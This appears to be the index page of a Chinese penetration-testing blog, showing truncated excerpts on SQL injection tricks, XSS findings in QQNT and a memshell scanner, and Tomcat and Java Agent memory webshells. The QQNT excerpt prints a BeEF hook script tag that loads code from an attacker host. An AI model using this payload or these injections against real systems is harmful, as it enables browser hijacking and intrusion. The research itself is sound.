漏洞

漏洞

7 篇文章

工具

工具

4 篇文章

笔记

笔记

15 篇文章

WriteUp

WriteUp

0 篇文章

postgre like escape盲注
2025-12-30 853 字 4 分钟

postgre like escape盲注

postgre的like有个特性,不好解释直接上例子 1SELECT * FROM "public"."testtable" WHERE name like 'fl%\' 当like字符串结尾有\的时候,如果前面的字符串能在数据库里匹配到内容(且被匹配的字符串还有剩余)就会报错ERROR: LIKE pattern must not end with escape character,如果没匹配到就不报错(猜测是因为匹配没执行到\,所以不报错) 例如这么一个数据库 id name code pass 1 flag{12
qqnt PC端xss
2025-11-29 426 字 2 分钟

qqnt PC端xss

今天qq出了个xss,也是无敌了,下午出的漏洞过0点了还没修,我就寻思上线beef看看有啥,结果常规的payload不能上线: 1<script src="http://192.168.74.128:3000/hook.js"></script> 原因就是动态插入的script标签不会执行,是浏览器的一种安全策略,例如: 12<div id="qwe"></div><script>document.querySelector("#qwe").innerHTML+=&quot
java-memshell-scanner xss
2025-11-17 3.8k 字 23 分钟

java-memshell-scanner xss

说是研究的东西要落地,内存马落地可以写个jsp内存马查杀工具。我寻思先找几个现成的学习学习,然后看见了这个https://github.com/c0ny1/java-memshell-scanner 这个项目是写了个jsp查杀内存马,但是没有防xss,看了几个PR的Fork也都没防xss poc假设我是攻击者,我可以传这么个jsp上去: 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697
MATCH AGAINST注入
2025-11-17 467 字 2 分钟

MATCH AGAINST注入

遇见个死难注的站,一个引号报错俩引号正常,但是各种payload瞎几把注就是注不出来,没招了找开发要了源码,拼的sql大概是这样: 1select SQL_CALC_FOUND_ROWS id,title,name,tags, MATCH (title, tags) against ( '+参数' IN BOOLEAN MODE ) AS score FROM content where MATCH (title, tags) against ( '+参数' IN BOOLEAN MODE ) ORDER BY score DESC limit 0,1
hexo建站
2025-10-30 977 字 4 分钟

hexo建站

上回建站的时候没记录,这回记录一下安装过程 文档 | Hexo 安装hexo先根据官方文档里安装git和nodejs,如然后 1npm install -g hexo-cli 然后找个放博客的文件夹 1234567hexo init blogcd blognpm install#此时会卡死,看到目录里有pnpm-lock.yaml,估计是因为我有pnpm,所以直接用pnpm初始化了,执行下边的可以解决npm cache clean --forcerm -rf node_modules package-lock.jsonnpm install 现在其实就装好了,在blog目录里hexo se
JavaAgent内存马
2025-10-09 4.8k 字 23 分钟

JavaAgent内存马

Agent型内存马其实就不局限于tomcat了,它是给运行中的JVM加载了一个agentmain-Agent,这个agentmain-Agent用javassist生成了木马的字节码,然后用Instrumentation把字节码加到类的方法里实现的攻击。理论上其他java程序也能用这种方法注入内存马。 Agent有两种,premain-Agent是在 JVM 启动前加载的,agentmain-Agent是JVM 启动之后加载的。 几种 Java Agent 实例premain-Agent这部分和内存马无关,可以直接看agentmain-Agent,但是很多程序的破解版是用这种方法实现的,可以了
tomcat-valve型内存马
2025-10-09 602 字 3 分钟

tomcat-valve型内存马

valve型内存马非常直接,就是写个valve然后加到pipeline里。 在了解 Valve 之前,我们先来简单了解一下 Tomcat 中的管道机制。 我们知道,当 Tomcat 接收到客户端请求时,首先会使用 Connector 进行解析,然后发送到 Container 进行处理。那么我们的消息又是怎么在四类子容器中层层传递,最终送到 Servlet 进行处理的呢?这里涉及到的机制就是 Tomcat 管道机制。 管道机制主要涉及到两个名词,Pipeline(管道)和 Valve(阀门)。如果我们把请求比作管道(Pipeline)中流动的水,那么阀门(Valve)就可以用来在管道中实现各种
tomcat-servlet型内存马
2025-08-27 1.6k 字 8 分钟

tomcat-servlet型内存马

其实写完listener型内存马之后就去看servlet内存马了。但是太复杂,没看懂,护网一开就搁置了。 servlet是什么servlet就是实际处理业务的代码。像什么登录注册增删改查都是在servlet里写,然后web.xml里绑定一个url。 当然实际业务里都不写web.xml了。看眼自动生成的HelloServlet就知道,都是直接用注解: 12345678910111213141516171819202122232425262728package org.example.demo3;import java.io.*;import jakarta.servlet.http.*;impo
ez自动签到
2025-07-08 908 字 5 分钟

ez自动签到

ez要证书,证书以前免费,现在要积分申请了。积分还不能充值,只有签到和交poc能获得积分。poc交一个才10-20,一个月的证书都要50积分了,所以只能签到。但是天天签到太麻烦了,所以写了个脚本挂着。 去云码注册个账号,加客服扫码白嫖300积分,够用好长时间的了。 然后写个crontab挂服务器上就行了。最好挂俩账号,一个号俩月60积分,换个证书50积分,两个号轮着用。 crontab -e 10 9 * * * cd /checkin;python3 ez_checkin.py>>checkin.log 2>&1 ez_checkin.py: 1234567891
tomcat-listener型内存马
2025-05-26 1.1k 字 7 分钟

tomcat-listener型内存马

Listener型内存马不像Filter型那么复杂。Listener型内存马只涉及一个变量applicationEventListenersList。 tomcat有一堆listener,其中ServletRequestListener是监听http请求的,最适合做内存马。 准备环境和Filter型内存马一样新建项目,然后写一个正常的listener。 123456789101112131415161718192021package org.example.demo3;import jakarta.servlet.ServletRequestEvent;import jakarta.servl